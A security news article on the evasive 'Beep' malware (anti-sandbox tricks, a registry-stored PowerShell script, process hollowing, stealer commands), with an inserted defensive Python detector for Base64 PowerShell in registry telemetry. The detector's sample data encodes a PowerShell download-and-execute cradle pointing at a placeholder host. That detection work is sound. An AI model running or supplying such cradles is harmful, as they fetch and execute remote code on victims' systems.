
Beep, a new highly evasive malware appeared in the threat landscape


Experts detected a new evasive malware dubbed Beep that implements many anti-debugging and anti-sandbox techniques.

Researchers from Minerva recently discovered a new evasive malware dubbed Beep, which implements many anti-debugging and anti-sandbox techniques.

The name Beep comes from the use of techniques involved in delaying the execution through the use of the Beep API function.

The experts noticed several new samples that were uploaded to VirusTotal (VT) as .dll, .gif or .jpg files. The samples were labeled as ‘spreader’ and ‘detect-debug-environment’ by VT and were used to drop additional payloads.  

“Once we dug into this sample, we observed the use of a significant amount of evasion techniques. It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find.” reads the analysis published by the experts. “One such technique involved delaying execution through the use of the Beep API function, hence the malware’s name.” 

After performing anti-debugging and anti-VM checks, the malware dropper creates a new Windows Registry key and executes a Base64-encoded PowerShell script stored in a value (named ‘AphroniaHaimavati’) of that key.

In turn, the PowerShell script retrieves an injector from a remote server, which extracts and launches the payload using the Process Hollowing injection technique.
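The persistence step described above (a Base64-encoded PowerShell script stored in a registry value and executed from there) is something a defender can hunt for in endpoint telemetry. The following detector is an added example, not code from the article or from Minerva's report: it scans Sysmon-style "registry value set" (Event ID 13) records, decodes any Base64-shaped value (trying UTF-16LE, which PowerShell's `-EncodedCommand` uses, then UTF-8) and flags values that decode to PowerShell-like text. Only the value name `AphroniaHaimavati` comes from the article; the key path, the one-line log layout, the image paths, the indicator list and the sample script contents are constructed for the example.

```python
"""Added example, not the article's or Minerva's code: decode Base64-shaped
registry value data from Sysmon-style Event ID 13 records and flag values
that decode to PowerShell-like text.  Everything except the value name
'AphroniaHaimavati' is a constructed assumption."""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Sysmon Event ID 13 fields flattened onto one line (assumed layout).
EVENT = re.compile(
    r"EventID=(?P<id>\d+)\s+Image=(?P<image>\S+)\s+"
    r"TargetObject=(?P<target>\S+)\s+Details=(?P<details>.*)$"
)
# Only values shaped like a Base64 blob of some length are worth decoding.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
# Cmdlets and idioms commonly seen in downloader/loader scripts (assumed list).
PS_INDICATORS = re.compile(
    r"(Invoke-Expression|\bIEX\b|DownloadString|FromBase64String|"
    r"-EncodedCommand|Start-Process|New-Object\s+Net\.WebClient)",
    re.IGNORECASE,
)


@dataclass
class Finding:
    value_name: str
    image: str
    decoded: str
    indicators: List[str]


def decode_base64_text(blob: str) -> Optional[str]:
    """Return the text a Base64 blob decodes to, or None if it is not valid
    Base64 or does not decode to mostly-ASCII printable text.  ASCII bytes
    read as UTF-16LE become non-ASCII characters and UTF-16LE bytes read as
    UTF-8 contain NULs, so the printable/ASCII filter selects the encoding."""
    if not B64_SHAPE.match(blob):
        return None
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    best = None
    for enc in ("utf-16le", "utf-8"):
        try:
            text = raw.decode(enc)
        except UnicodeDecodeError:
            continue
        if not text or not all(c.isprintable() or c in "\r\n\t" for c in text):
            continue
        ascii_ratio = sum(c.isascii() for c in text) / len(text)
        if best is None or ascii_ratio > best[0]:
            best = (ascii_ratio, text)
    return best[1] if best is not None and best[0] >= 0.9 else None


def scan_events(lines) -> List[Finding]:
    """Return a Finding for each value-set event whose data decodes to text
    containing at least one PowerShell indicator."""
    findings = []
    for line in lines:
        m = EVENT.match(line)
        if m is None or m.group("id") != "13":
            continue
        decoded = decode_base64_text(m.group("details"))
        if decoded is None:
            continue
        hits = sorted({h.group(0) for h in PS_INDICATORS.finditer(decoded)})
        if hits:
            value_name = m.group("target").rsplit("\\", 1)[-1]
            findings.append(Finding(value_name, m.group("image"), decoded, hits))
    return findings


def b64_of(text: str, enc: str) -> str:
    """Base64 of `text` encoded as `enc`; used to build the sample data."""
    return base64.b64encode(text.encode(enc)).decode("ascii")


BINARY_BLOB = base64.b64encode(bytes(range(32))).decode("ascii")

# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    # Ordinary Explorer setting: not Base64-shaped, ignored.
    r"EventID=13 Image=C:\Windows\explorer.exe "
    r"TargetObject=HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden "
    r"Details=DWORD (0x00000001)",
    # Beep-style persistence: UTF-16LE PowerShell stager in 'AphroniaHaimavati'
    # (key name and script are constructed; the URL is a placeholder).
    r"EventID=13 Image=C:\Users\Public\update.dll "
    r"TargetObject=HKU\S-1-5-21-1000\Software\ExampleKey\AphroniaHaimavati "
    "Details=" + b64_of("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')", "utf-16le"),
    # Valid Base64 but binary data: decodes to unprintable bytes, ignored.
    r"EventID=13 Image=C:\Windows\System32\svchost.exe "
    r"TargetObject=HKLM\Software\ExampleVendor\LicenseBlob "
    "Details=" + BINARY_BLOB,
    # Same pattern stored as UTF-8 rather than UTF-16LE: still caught.
    r"EventID=13 Image=C:\Users\Public\loader.exe "
    r"TargetObject=HKCU\Software\ExampleKey\Run "
    "Details=" + b64_of("Invoke-Expression (Get-Content C:\\Users\\Public\\stage.txt -Raw)", "utf-8"),
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f.image} set {f.value_name}: {f.indicators}")
```

Run against the constructed events it reports the two PowerShell values and ignores the DWORD and the binary blob. The ASCII-ratio filter is what lets the same function handle both encodings without a heuristic "looks like UTF-16" check; in practice the indicator list would be tuned to the environment, and the event source would be a SIEM query over Sysmon or EDR registry telemetry rather than an in-memory list.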

The attack chain ends by dropping an information stealer on the victim’s system. The stealer supports multiple commands, some of which are not yet implemented, including:

  • balancer – not implemented yet. 
  • init – not implemented yet. 
  • screenshoot – appears to collect the process list. 
  • task – not implemented yet. 
  • destroy – not implemented yet. 
  • shellcode – executes additional shellcode. 
  • dll – executes a dll file. 
  • exe – executes a .exe file. 
  • Additional – collects additional info. 
  • knock_timeout – changes C&C “keep-alive” intervals. 

The experts pointed out that once the Beep malware has infected a system, it can be used to spread a wide range of additional malicious payloads and hacking tools, including ransomware.

“The new Beep malware’s efforts to evade detection set it apart from other malware. The sheer number of evasive techniques it implements to avoid sandboxes, VMs, and other debugging techniques is not often seen.” concludes the report, which also includes Indicators of Compromise (IoCs) for this emerging threat.


Pierluigi Paganini

(SecurityAffairs – hacking, Beep malware)